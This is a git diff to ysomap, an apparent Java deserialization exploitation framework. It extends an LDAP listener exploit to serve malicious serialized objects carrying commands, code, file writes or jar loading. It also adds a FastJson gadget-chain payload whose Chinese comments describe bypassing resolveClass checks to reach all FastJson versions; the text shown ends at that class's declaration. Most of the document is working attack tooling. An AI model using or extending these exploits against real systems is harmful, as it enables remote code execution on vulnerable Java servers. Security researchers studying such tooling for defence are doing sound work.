diff --git a/common/src/main/java/ysomap/common/annotation/Authors.java b/common/src/main/java/ysomap/common/annotation/Authors.java
index c69ea3a..d70c5e1 100755
--- a/common/src/main/java/ysomap/common/annotation/Authors.java
+++ b/common/src/main/java/ysomap/common/annotation/Authors.java
@@ -28,6 +28,7 @@
String LALA = "lala";
String KINGX = "kingx";
String JANG = "Jang";
+ String whocansee = "whocansee";
String[] value() default {};
diff --git a/core/pom.xml b/core/pom.xml
index 0152ce9..3cfa7b4 100644
--- a/core/pom.xml
+++ b/core/pom.xml
@@ -49,10 +49,35 @@
compile
+
+ com.fasterxml.jackson.core
+ jackson-annotations
+ 2.13.2
+
+
+ com.fasterxml.jackson.core
+ jackson-core
+ 2.13.2
+
com.fasterxml.jackson.core
jackson-databind
- ${jackson.version}
+ 2.13.2
+
+
+ com.fasterxml.jackson.datatype
+ jackson-datatype-jdk8
+ 2.13.2
+
+
+ com.fasterxml.jackson.datatype
+ jackson-datatype-jsr310
+ 2.13.2
+
+
+ com.fasterxml.jackson.module
+ jackson-module-parameter-names
+ 2.13.2
${hessian.group}
diff --git a/core/src/main/java/ysomap/bullets/jdk/rmi/TomcatRefBullet.java b/core/src/main/java/ysomap/bullets/jdk/rmi/TomcatRefBullet.java
index af51931..45733a1 100755
--- a/core/src/main/java/ysomap/bullets/jdk/rmi/TomcatRefBullet.java
+++ b/core/src/main/java/ysomap/bullets/jdk/rmi/TomcatRefBullet.java
@@ -75,12 +75,12 @@ public String getPayload(String data){
".eval(\""+ data +"\")";
}
- public static Bullet newInstance(Object... args) throws Exception {
+ public static Bullet newInstance(Object...args) throws Exception {
Bullet bullet = new TomcatRefBullet();
- bullet.set("type", args[0]);
- bullet.set("body", args[1]);
- bullet.set("classname", args[2]);
- bullet.set("filepath", args[3]);
+ bullet.set("body", args[0]);
+ bullet.set("classname", args[1]);
+ bullet.set("filepath", args[2]);
+ bullet.set("type", args[3]);
return bullet;
}
diff --git a/core/src/main/java/ysomap/exploits/ldap/LDAPTomcatRefListener.java b/core/src/main/java/ysomap/exploits/ldap/LDAPTomcatRefListener.java
index 0c87f71..f68020e 100644
--- a/core/src/main/java/ysomap/exploits/ldap/LDAPTomcatRefListener.java
+++ b/core/src/main/java/ysomap/exploits/ldap/LDAPTomcatRefListener.java
@@ -35,8 +35,18 @@ public class LDAPTomcatRefListener extends AbstractExploit {
public String lport = "1389";
@NotNull
- @Require(name = "command", detail = DetailHelper.COMMAND)
- private String command;
+ @Require(name = "body", detail = "根据type类型,传入命令或代码")
+ private String body;
+
+ @Require(name = "classname", detail = "当type为代码时,需要填上最终载入的classname")
+ private String classname;
+
+ @Require(name = "filepath", detail = "当type为fw时,需要填上最终写入的文件位置")
+ private String filepath;
+
+ @NotNull
+ @Require(name = "type", detail = "支持cmd、code、fw、loadJar")
+ private String type;
private InMemoryDirectoryServer ds;
@@ -54,7 +64,7 @@ public void work() {
SocketFactory.getDefault(),
(SSLSocketFactory) SSLSocketFactory.getDefault()));
Serializer serializer = SerializerFactory.createSerializer("default");
- Bullet bullet = TomcatRefBullet.newInstance("cmd", command, null, null);
+ Bullet bullet = TomcatRefBullet.newInstance(type, body,classname,filepath);
config.addInMemoryOperationInterceptor(
new LocalChainOperationInterceptor((byte[]) serializer.serialize(bullet.getObject())));
ds = new InMemoryDirectoryServer(config);
@@ -77,7 +87,7 @@ public void stop() {
public String toString() {
return "LDAPTomcatRefListener{" +
"lport='" + lport + '\'' +
- ", command='" + command + '\'' +
+ ", command='" + body + '\'' +
'}';
}
}
diff --git a/core/src/main/java/ysomap/payloads/java/fastjson/BadAttributeValueExpExceptionWithJsonObject.java b/core/src/main/java/ysomap/payloads/java/fastjson/BadAttributeValueExpExceptionWithJsonObject.java
new file mode 100644
index 0000000..75f2e65
--- /dev/null
+++ b/core/src/main/java/ysomap/payloads/java/fastjson/BadAttributeValueExpExceptionWithJsonObject.java
@@ -0,0 +1,73 @@
+package ysomap.payloads.java.fastjson;
+
+import com.alibaba.fastjson.JSONObject;
+import ysomap.bullets.Bullet;
+import ysomap.bullets.jdk.LdapAttributeBullet;
+import ysomap.common.annotation.*;
+import ysomap.core.util.DetailHelper;
+import ysomap.core.util.PayloadHelper;
+import ysomap.payloads.AbstractPayload;
+
+import javax.management.BadAttributeValueExpException;
+import java.io.Serializable;
+import java.lang.reflect.Field;
+import java.security.KeyPair;
+import java.security.KeyPairGenerator;
+import java.security.Signature;
+import java.security.SignedObject;
+import java.util.HashMap;
+import java.util.Objects;
+
+/**
+ * @author whocansee
+ * @since 2023/10/7
+ * BadAttributeValueExpException.readObject->JsonObject.toString->bullet对象的getter方法
+ * 原链JsonObject1缺失触发toString的部分,且仅支持FastJson低版本
+ * 此链根据Y4tacker师傅的思路实现了Reference包裹绕过高版本后JsonObject重写的readObject方法中的resolveClass检查,从而支持FastJson全版本
+ * 由于FastJson序列化逻辑中getter调用顺序的问题,在调用到getDatabaseMetaData()之前就会报错,因而不支持JdbcRowSetImplBullet
+ */
+@Payloads
+@SuppressWarnings({"rawtypes"})
+@Authors({ Authors.whocansee })
+@Targets({Targets.JDK})
+@Require(bullets = {"LdapAttributeBullet", "TemplatesImplBullet"}, param = false)
+@Dependencies({"FastJson all versions."})
+@Details("BadAttributeValueExpException.readObject->JsonObject.toString->bullet对象的getter方法" +
+ "此链根据Y4tacker师傅的思路实现了Reference包裹绕过高版本后JsonObject重写的readObject方法中的resolveClass检查,从而支持FastJson全版本")
+
+public class BadAttributeValueExpExceptionWithJsonObject extends AbstractPayload